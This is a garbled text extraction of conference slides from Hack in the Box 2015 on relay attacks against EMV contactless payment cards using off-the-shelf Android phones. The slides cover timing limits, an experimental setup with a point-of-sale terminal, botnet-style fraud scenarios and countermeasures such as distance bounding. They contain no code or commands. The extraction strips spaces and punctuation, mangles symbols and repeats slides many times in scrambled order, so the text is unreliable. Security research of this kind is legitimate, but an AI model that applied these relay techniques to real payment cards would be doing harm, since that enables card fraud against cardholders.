FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
